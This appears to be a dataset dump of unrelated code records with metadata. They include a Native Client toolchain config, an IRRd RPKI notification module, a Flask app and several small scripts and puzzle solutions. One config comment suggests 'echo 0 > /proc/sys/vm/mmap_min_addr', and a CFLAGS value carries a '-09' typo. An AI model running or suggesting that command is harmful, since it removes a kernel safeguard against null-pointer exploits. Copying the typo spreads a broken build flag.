TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O9'] = ToolchainConfig( desc='pnacl llvm with optimizations [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-09 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors 
COMMANDS_llvm_pnacl_x86_O0 = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-x8632', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s', ), ('sel_ldr', '%(SEL_LDR)s %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_x8632_O0'] = ToolchainConfig( desc='pnacl llvm [x8632]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X32], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-32', SEL_LDR = SEL_LDR_X32, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8664] ###################################################################### TOOLCHAIN_CONFIGS['llvm_pnacl_x8664_O0'] = ToolchainConfig( desc='pnacl llvm [x8664]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X64], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-64', SEL_LDR = SEL_LDR_X64, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS)
# Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # import os import sys TOOLCHAIN_CONFIGS = {} class ToolchainConfig(object): def __init__(self, desc, commands, tools_needed, **extra): self._desc = desc, self._commands = commands self._tools_needed = tools_needed self._extra = extra def Append(self, tag, value): assert tag in self._extra self._extra[tag] = self._extra[tag] + ' ' + value + ' ' def SanityCheck(self): for t in self._tools_needed: if not os.access(t, os.R_OK | os.X_OK): print "ERROR: missing tool ", t sys.exit(-1) def GetDescription(self): return self._desc def GetCommands(self, extra): for tag, val in self._commands: d = {} d.update(self._extra) d.update(extra) yield tag, val % d def GetPhases(self): return [a for (a, _) in self._commands] ###################################################################### # ###################################################################### LOCAL_GCC = '/usr/bin/gcc' EMU_SCRIPT = 'toolchain/linux_arm-trusted/qemu_tool.sh' SEL_LDR_ARM = 'scons-out/opt-linux-arm/staging/sel_ldr' SEL_LDR_X32 = 'scons-out/opt-linux-x86-32/staging/sel_ldr' SEL_LDR_X64 = 'scons-out/opt-linux-x86-64/staging/sel_ldr' NACL_GCC_X32 = 'toolchain/linux_x86/bin/nacl-gcc' NACL_GCC_X64 = 'toolchain/linux_x86/bin/nacl64-gcc' GLOBAL_CFLAGS = '-DSTACK_SIZE=0x40000 -DNO_TRAMPOLINES -DNO_LABEL_VALUES' ###################################################################### # LOCAL GCC ###################################################################### COMMANDS_local_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ] TOOLCHAIN_CONFIGS['local_gcc_x8632_O0'] = ToolchainConfig( desc='local gcc [x86-32]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m32 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['local_gcc_x8664_O0'] = 
ToolchainConfig( desc='local gcc [x86-64]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m64 -static ' + GLOBAL_CFLAGS) ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" GCC_CS_ARM = ('toolchain/linux_arm-trusted/arm-2009q3/' + 'bin/arm-none-linux-gnueabi-gcc') COMMANDS_gcc_cs_arm = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('emu', '%(EMU_SCRIPT)s run %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['gcc_cs_arm_O0'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['gcc_cs_arm_O9'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### COMMANDS_nacl_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('sel_ldr', '%(SEL_LDR)s -f %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O0'] = ToolchainConfig( desc='nacl gcc [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O9 -static') TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O0'] = ToolchainConfig( desc='nacl gcc [x86-64]', 
commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### DRIVER_PATH = 'toolchain/linux_arm-untrusted/bin' PNACL_LLVM_GCC = DRIVER_PATH + '/pnacl-gcc' PNACL_BCLD = DRIVER_PATH + '/pnacl-bcld' PNACL_LIB_DIR = 'toolchain/linux_arm-untrusted/libs-bitcode/' COMMANDS_llvm_pnacl_arm = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-arm', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s -lc -lnacl -lnosys', ), ('qemu-sel_ldr', '%(EMU)s run %(SEL_LDR)s -Q -d %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O0'] = ToolchainConfig( desc='pnacl llvm [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O9'] = ToolchainConfig( desc='pnacl llvm with optimizations [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-09 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors COMMANDS_llvm_pnacl_x86_O0 
= [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-x8632', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s', ), ('sel_ldr', '%(SEL_LDR)s %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_x8632_O0'] = ToolchainConfig( desc='pnacl llvm [x8632]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X32], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-32', SEL_LDR = SEL_LDR_X32, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8664] ###################################################################### TOOLCHAIN_CONFIGS['llvm_pnacl_x8664_O0'] = ToolchainConfig( desc='pnacl llvm [x8664]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X64], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-64', SEL_LDR = SEL_LDR_X64, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS)
de
0.721475
# Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # ###################################################################### # ###################################################################### ###################################################################### # LOCAL GCC ###################################################################### ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors ###################################################################### # PNACL + SEL_LDR [X8664] ######################################################################
2.008743
2
fsl/models/torch/__init__.py
yanncalec/few-shot-learning-benchmark
0
6623632
"""PyTorch implementation. """ from .prototypical_networks import ProtoNet
"""PyTorch implementation. """ from .prototypical_networks import ProtoNet
en
0.5801
PyTorch implementation.
1.110532
1
app/enhanced_mapper/__init__.py
mappercore/mapper-core
1
6623633
<reponame>mappercore/mapper-core from .cover import * from .node import * from .oracle import * from .graph import * from .mapper import * # from .converter import * from .visualization import *
from .cover import * from .node import * from .oracle import * from .graph import * from .mapper import * # from .converter import * from .visualization import *
en
0.394251
# from .converter import *
0.937203
1
testbed_image/testbed_image.py
terop/env-logger
0
6623634
#!/usr/bin/env python3 """A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success.""" # See PIP requirements from testbed_image_requirements.txt import sys from datetime import datetime import requests from bs4 import BeautifulSoup import pytz def download_image(): """Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise.""" timestamp = datetime.now().isoformat() try: resp = requests.get('http://testbed.fmi.fi/?imgtype=radar&t=5&n=1') # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to access Testbed page: {}'.format(timestamp, ce), file=sys.stderr) return None if not resp.ok: return None # pylint: disable=invalid-name bs = BeautifulSoup(resp.text, 'lxml') images = bs.find_all(id='anim_image_anim_anim') if len(images) != 1: return None img_url = images[0]['src'] if img_url == '': return None try: resp = requests.get(img_url) # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to download Testbed image: {}'.format(timestamp, ce), file=sys.stderr) return None return resp.content def main(): """Module main function.""" image = download_image() if not image: print('') return 1 helsinki = pytz.timezone('Europe/Helsinki') filename = 'testbed-{}.png'.format( helsinki.localize(datetime.now()).strftime('%Y-%m-%dT%H:%M%z')) with open(filename, 'wb') as tb_image: tb_image.write(image) print(filename) return 0 main()
#!/usr/bin/env python3 """A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success.""" # See PIP requirements from testbed_image_requirements.txt import sys from datetime import datetime import requests from bs4 import BeautifulSoup import pytz def download_image(): """Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise.""" timestamp = datetime.now().isoformat() try: resp = requests.get('http://testbed.fmi.fi/?imgtype=radar&t=5&n=1') # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to access Testbed page: {}'.format(timestamp, ce), file=sys.stderr) return None if not resp.ok: return None # pylint: disable=invalid-name bs = BeautifulSoup(resp.text, 'lxml') images = bs.find_all(id='anim_image_anim_anim') if len(images) != 1: return None img_url = images[0]['src'] if img_url == '': return None try: resp = requests.get(img_url) # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to download Testbed image: {}'.format(timestamp, ce), file=sys.stderr) return None return resp.content def main(): """Module main function.""" image = download_image() if not image: print('') return 1 helsinki = pytz.timezone('Europe/Helsinki') filename = 'testbed-{}.png'.format( helsinki.localize(datetime.now()).strftime('%Y-%m-%dT%H:%M%z')) with open(filename, 'wb') as tb_image: tb_image.write(image) print(filename) return 0 main()
en
0.632281
#!/usr/bin/env python3 A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success. # See PIP requirements from testbed_image_requirements.txt Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise. # pylint: disable=invalid-name # pylint: disable=invalid-name # pylint: disable=invalid-name Module main function.
2.716533
3
math/linereflection.py
mengyangbai/leetcode
0
6623635
class Solution: def isReflected(self, points): if (not points): return True dic = {} sumx = 0 lenwithoutdup = 0 for point in points: if point[1] not in dic: dic[point[1]] = {point[0]} sumx += point[0] lenwithoutdup += 1 else: if point[0] not in dic[point[1]]: dic[point[1]].add(point[0]) sumx += point[0] lenwithoutdup += 1 #print sumx, lenwithoutdup avgx = float(sumx)/lenwithoutdup for item in dic: lst = list(dic[item]) lst.sort() i, j = 0, len(lst)-1 # two pointers while i <= j: #print lst[i], avgx, lst[j] if lst[i] - avgx != avgx - lst[j]: return False i += 1 j -= 1 return True class betterSolution: def isReflected(self, points: [[int]]) -> bool: if not points: return True midx = (min(x for x, _ in points) + max(x for x, _ in points))/2 p = set(map(tuple, points)) return all((2 * midx-x, y) in p for x, y in points)
class Solution: def isReflected(self, points): if (not points): return True dic = {} sumx = 0 lenwithoutdup = 0 for point in points: if point[1] not in dic: dic[point[1]] = {point[0]} sumx += point[0] lenwithoutdup += 1 else: if point[0] not in dic[point[1]]: dic[point[1]].add(point[0]) sumx += point[0] lenwithoutdup += 1 #print sumx, lenwithoutdup avgx = float(sumx)/lenwithoutdup for item in dic: lst = list(dic[item]) lst.sort() i, j = 0, len(lst)-1 # two pointers while i <= j: #print lst[i], avgx, lst[j] if lst[i] - avgx != avgx - lst[j]: return False i += 1 j -= 1 return True class betterSolution: def isReflected(self, points: [[int]]) -> bool: if not points: return True midx = (min(x for x, _ in points) + max(x for x, _ in points))/2 p = set(map(tuple, points)) return all((2 * midx-x, y) in p for x, y in points)
en
0.269796
#print sumx, lenwithoutdup # two pointers #print lst[i], avgx, lst[j]
3.23208
3
irrd/rpki/notifications.py
mirceaulinic/irrd
94
6623636
import itertools import logging from collections import defaultdict from typing import Dict, List, Set from irrd.conf import get_setting from irrd.rpki.status import RPKIStatus from irrd.rpsl.parser import RPSLObject from irrd.rpsl.rpsl_objects import rpsl_object_from_text from irrd.storage.database_handler import DatabaseHandler from irrd.storage.queries import RPSLDatabaseQuery from irrd.utils.email import send_email logger = logging.getLogger(__name__) def notify_rpki_invalid_owners(database_handler: DatabaseHandler, rpsl_dicts_now_invalid: List[Dict[str, str]]) -> int: """ Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. """ if not get_setting('rpki.notify_invalid_enabled'): return 0 rpsl_objs = [] for obj in rpsl_dicts_now_invalid: source = obj['source'] authoritative = get_setting(f'sources.{source}.authoritative') if authoritative and obj['rpki_status'] == RPKIStatus.invalid: rpsl_objs.append(rpsl_object_from_text(obj['object_text'])) if not rpsl_objs: return 0 sources = set([obj.parsed_data['source'] for obj in rpsl_objs]) mntner_emails_by_source = {} for source in sources: # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. 
mntner_emails = defaultdict(set) # Step 1: retrieve all relevant maintainers from the DB mntner_pks = set(itertools.chain(*[ obj.parsed_data.get('mnt-by', []) for obj in rpsl_objs if obj.parsed_data['source'] == source ])) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(mntner_pks).object_classes(['mntner']) mntners = list(database_handler.execute_query(query)) # Step 2: any mnt-nfy on these maintainers is a contact address for mntner in mntners: mntner_emails[mntner['rpsl_pk']].update(mntner['parsed_data'].get('mnt-nfy', [])) # Step 3: extract the contact handles for each maintainer mntner_contacts = { m['rpsl_pk']: m['parsed_data'].get('tech-c', []) + m['parsed_data'].get('admin-c', []) for m in mntners } # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses contact_pks = set(itertools.chain(*mntner_contacts.values())) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(contact_pks).object_classes(['role', 'person']) contacts = { r['rpsl_pk']: r['parsed_data'].get('e-mail', []) for r in database_handler.execute_query(query) } # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer for mntner_pk, mntner_contacts in mntner_contacts.items(): for contact_pk in mntner_contacts: try: mntner_emails[mntner_pk].update(contacts[contact_pk]) except KeyError: pass mntner_emails_by_source[source] = mntner_emails # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. 
objs_per_email: Dict[str, Set[RPSLObject]] = defaultdict(set) for rpsl_obj in rpsl_objs: mntners = rpsl_obj.parsed_data.get('mnt-by', []) source = rpsl_obj.parsed_data['source'] for mntner_pk in mntners: try: for email in mntner_emails_by_source[source][mntner_pk]: objs_per_email[email].add(rpsl_obj) except KeyError: # pragma: no cover pass header_template = get_setting('rpki.notify_invalid_header', '') subject_template = get_setting('rpki.notify_invalid_subject', '').replace('\n', ' ') for email, objs in objs_per_email.items(): sources_str = ', '.join(set([obj.parsed_data['source'] for obj in objs])) subject = subject_template.format(sources_str=sources_str, object_count=len(objs)) body = header_template.format(sources_str=sources_str, object_count=len(objs)) body += '\nThe following objects are affected:\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n' for rpsl_obj in objs: body += rpsl_obj.render_rpsl_text() + '\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' try: send_email(email, subject, body) except Exception as e: # pragma: no cover logger.warning(f'Unable to send RPKI invalid notification to {email}: {e}') return len(objs_per_email.keys())
import itertools import logging from collections import defaultdict from typing import Dict, List, Set from irrd.conf import get_setting from irrd.rpki.status import RPKIStatus from irrd.rpsl.parser import RPSLObject from irrd.rpsl.rpsl_objects import rpsl_object_from_text from irrd.storage.database_handler import DatabaseHandler from irrd.storage.queries import RPSLDatabaseQuery from irrd.utils.email import send_email logger = logging.getLogger(__name__) def notify_rpki_invalid_owners(database_handler: DatabaseHandler, rpsl_dicts_now_invalid: List[Dict[str, str]]) -> int: """ Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. """ if not get_setting('rpki.notify_invalid_enabled'): return 0 rpsl_objs = [] for obj in rpsl_dicts_now_invalid: source = obj['source'] authoritative = get_setting(f'sources.{source}.authoritative') if authoritative and obj['rpki_status'] == RPKIStatus.invalid: rpsl_objs.append(rpsl_object_from_text(obj['object_text'])) if not rpsl_objs: return 0 sources = set([obj.parsed_data['source'] for obj in rpsl_objs]) mntner_emails_by_source = {} for source in sources: # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. 
mntner_emails = defaultdict(set) # Step 1: retrieve all relevant maintainers from the DB mntner_pks = set(itertools.chain(*[ obj.parsed_data.get('mnt-by', []) for obj in rpsl_objs if obj.parsed_data['source'] == source ])) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(mntner_pks).object_classes(['mntner']) mntners = list(database_handler.execute_query(query)) # Step 2: any mnt-nfy on these maintainers is a contact address for mntner in mntners: mntner_emails[mntner['rpsl_pk']].update(mntner['parsed_data'].get('mnt-nfy', [])) # Step 3: extract the contact handles for each maintainer mntner_contacts = { m['rpsl_pk']: m['parsed_data'].get('tech-c', []) + m['parsed_data'].get('admin-c', []) for m in mntners } # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses contact_pks = set(itertools.chain(*mntner_contacts.values())) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(contact_pks).object_classes(['role', 'person']) contacts = { r['rpsl_pk']: r['parsed_data'].get('e-mail', []) for r in database_handler.execute_query(query) } # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer for mntner_pk, mntner_contacts in mntner_contacts.items(): for contact_pk in mntner_contacts: try: mntner_emails[mntner_pk].update(contacts[contact_pk]) except KeyError: pass mntner_emails_by_source[source] = mntner_emails # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. 
objs_per_email: Dict[str, Set[RPSLObject]] = defaultdict(set) for rpsl_obj in rpsl_objs: mntners = rpsl_obj.parsed_data.get('mnt-by', []) source = rpsl_obj.parsed_data['source'] for mntner_pk in mntners: try: for email in mntner_emails_by_source[source][mntner_pk]: objs_per_email[email].add(rpsl_obj) except KeyError: # pragma: no cover pass header_template = get_setting('rpki.notify_invalid_header', '') subject_template = get_setting('rpki.notify_invalid_subject', '').replace('\n', ' ') for email, objs in objs_per_email.items(): sources_str = ', '.join(set([obj.parsed_data['source'] for obj in objs])) subject = subject_template.format(sources_str=sources_str, object_count=len(objs)) body = header_template.format(sources_str=sources_str, object_count=len(objs)) body += '\nThe following objects are affected:\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n' for rpsl_obj in objs: body += rpsl_obj.render_rpsl_text() + '\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' try: send_email(email, subject, body) except Exception as e: # pragma: no cover logger.warning(f'Unable to send RPKI invalid notification to {email}: {e}') return len(objs_per_email.keys())
en
0.855802
Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. # Step 1: retrieve all relevant maintainers from the DB # Step 2: any mnt-nfy on these maintainers is a contact address # Step 3: extract the contact handles for each maintainer # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. # pragma: no cover # pragma: no cover
2.382303
2
Python/Ex028.py
renato-rt/Python
0
6623637
<gh_stars>0 from time import sleep from random import randint print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') print('Vou pensar em um número entre 0 e 5. Tente advinhar...') print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') user = int(input('Em qual número estou pensando? ')) print('Processando...') sleep(1) lista = randint(0, 5) if user == lista: print('Parabéns você acertou!!!') else: print('Lamento, eu pensei no número {}, tente outra vez.'.format(lista))
from time import sleep from random import randint print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') print('Vou pensar em um número entre 0 e 5. Tente advinhar...') print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') user = int(input('Em qual número estou pensando? ')) print('Processando...') sleep(1) lista = randint(0, 5) if user == lista: print('Parabéns você acertou!!!') else: print('Lamento, eu pensei no número {}, tente outra vez.'.format(lista))
none
1
3.683389
4
src/day10_mp.py
dev-mbusch/adventofcode2020
0
6623638
<reponame>dev-mbusch/adventofcode2020 with open("input_files\day10_input_mp.txt") as file: input = [int(value) for value in file.read().split("\n")] # input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) input.sort() jolt_differences = [-1*(input[count-1] - jolt) for count, jolt in enumerate(input)] # add charging outlet jolt_differences[0] = input[0] # add device's built in adapter jolt_differences.append(3) print("Solution part 1: ", jolt_differences.count(1) * jolt_differences.count(3)) # Part 2 # cut list into sublists with only 1 step jolt differences subsequences = [] start = 0 end = int() for count, difference in enumerate(jolt_differences): if difference == 3: end = count subsequences.append(jolt_differences[start:end]) start = end # number of combinations matches fibonacci sequence def tribonacci(signature, n): res = signature[:n] for i in range(n - 3): res.append(sum(res[-3:])) return res count_ones = [] for subsequence in subsequences: count_ones.append(subsequence.count(1)) solution2 = 1 for value in count_ones: if value > 0: solution2 *= max(tribonacci([0,0,1], value + 3)) print("Solution part 2: ", solution2)
with open("input_files\day10_input_mp.txt") as file: input = [int(value) for value in file.read().split("\n")] # input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) input.sort() jolt_differences = [-1*(input[count-1] - jolt) for count, jolt in enumerate(input)] # add charging outlet jolt_differences[0] = input[0] # add device's built in adapter jolt_differences.append(3) print("Solution part 1: ", jolt_differences.count(1) * jolt_differences.count(3)) # Part 2 # cut list into sublists with only 1 step jolt differences subsequences = [] start = 0 end = int() for count, difference in enumerate(jolt_differences): if difference == 3: end = count subsequences.append(jolt_differences[start:end]) start = end # number of combinations matches fibonacci sequence def tribonacci(signature, n): res = signature[:n] for i in range(n - 3): res.append(sum(res[-3:])) return res count_ones = [] for subsequence in subsequences: count_ones.append(subsequence.count(1)) solution2 = 1 for value in count_ones: if value > 0: solution2 *= max(tribonacci([0,0,1], value + 3)) print("Solution part 2: ", solution2)
en
0.528251
# input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) # add charging outlet # add device's built in adapter # Part 2 # cut list into sublists with only 1 step jolt differences # number of combinations matches fibonacci sequence
3.358563
3
app.py
jhanley-com/google-cloud-run-getting-started-python-flask
5
6623639
<reponame>jhanley-com/google-cloud-run-getting-started-python-flask<filename>app.py import os import logging from flask import Flask # Change the format of messages logged to Stackdriver logging.basicConfig(format='%(message)s', level=logging.INFO) app = Flask(__name__) @app.route('/') def home(): html = """ <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html> """ return html if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
import os import logging from flask import Flask # Change the format of messages logged to Stackdriver logging.basicConfig(format='%(message)s', level=logging.INFO) app = Flask(__name__) @app.route('/') def home(): html = """ <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html> """ return html if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
en
0.301468
# Change the format of messages logged to Stackdriver <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html>
2.683525
3
tests/test_OcsGenericEntityCli.py
lsst-ts/ts_ocs_sequencer
0
6623640
